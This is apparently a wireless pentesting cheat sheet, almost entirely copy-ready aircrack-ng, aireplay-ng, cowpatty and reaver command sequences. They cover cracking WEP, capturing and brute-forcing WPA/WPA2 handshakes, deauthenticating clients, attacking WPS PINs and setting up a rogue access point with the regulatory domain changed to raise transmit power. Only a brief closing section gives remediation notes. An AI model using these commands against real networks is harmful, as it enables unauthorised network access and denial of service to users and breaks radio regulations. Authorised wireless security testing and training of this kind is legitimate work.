"WirelessTesting - Hacking"
airmon-ng start wlan0 (AP Channel)
airodump-ng -c (AP Channel) --bssid (AP MAC) -w (filename) wlan0mon
aireplay-ng -1 0 -e (AP ESSID) -a (AP MAC) -h (Attacker MAC) wlan0mon
aireplay-ng -3 -b (AP MAC) -h (Attacker MAC) wlan0mon # ARP Replay
aireplay-ng -0 1 -a (AP MAC) -c (Client MAC) wlan0mon
aircrack-ng -0 (filename.cap)
airmon-ng start wlan0 (AP Channel)
airodump-ng -c (AP Channel) --bssid (AP MAC) -w (filename) wlan0mon
aireplay-ng -1 0 -e (AP ESSID) -a (AP MAC) -h (Attacker MAC) wlan0mon
aireplay-ng -5 -b (AP MAC) -h (Attacker MAC) wlan0mon
packetforge-ng -0 -a (AP MAC) -h (Attacker MAC) -l (Source IP) -k (Dest IP) -y (xor filename) -w (packet filename)
tcpdump -n -vvv -e -s0 -r (packet filename)
aireplay-ng -2 -r (packet filename) wlan0mon
aircrack-ng -0 (filename)
WPA PSK attack with aircrack-ng suite.
airmon-ng start wlan0 (AP Channel)
airodump-ng -c (AP Channel) --bssid (AP MAC) -w (filename) wlan0mon
aireplay-ng -0 1 -a (AP MAC) -c (Victim MAC) wlan0mon
aircrack-ng -0 -w (wordlist) (capture file)
You can capture the handshake passively (it takes time) or de-authenticate a client.
De-authentication attack
aireplay-ng --deauth 3 -a (BSSID) -c (client_mac) mon0
Deauth every client - aireplay-ng -0 5 -a (bssid) mon0
Dictionary Attack
aircrack-ng -w passwords.lst capture-01.cap
Brute force Attack
crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap
CoWPAtty Attack
Wordlist mode:
cowpatty -r (Capture file) -f (wordlist) -2 -s (AP ESSID)
PMK mode:
genpmk -f (wordlist) -d (hash filename) -s (AP ESSID)
cowpatty -r (Capture file) -d (hash filename) -2 -s (AP ESSID)
Rogue Access Point Testing
ifconfig wlan0 down
iw reg set BO
iwconfig wlan0 txpower 0
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng --write capture mon0
ifconfig wlan1 down
iw reg set BO
ifconfig wlan1 up
iwconfig wlan1 channel 13
iwconfig wlan1 txpower 30
iwconfig wlan1 rate 11M auto
Reaver
airmon-ng start wlan0
airodump-ng wlan0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1
Pixie WPS
airmon-ng check
airmon-ng start wlan0
airodump-ng wlan0mon --wps
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1
Wireless Notes
Wired Equivalent Privacy (WEP)
RC4 stream cipher w/ CRC32 for integrity check
- Attack:
By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs. - Remediation:
Use WPA2
Wifi Protected Access (WPA)
Temporal Key Integrity Protocol (TKIP) Message Integrity Check
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. - Remediation:
Use long-keys
Wifi Protected Access 2 (WPA2)
Advanced Encryption Standard (AES)
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. - Remediation:
WPA-Enterprise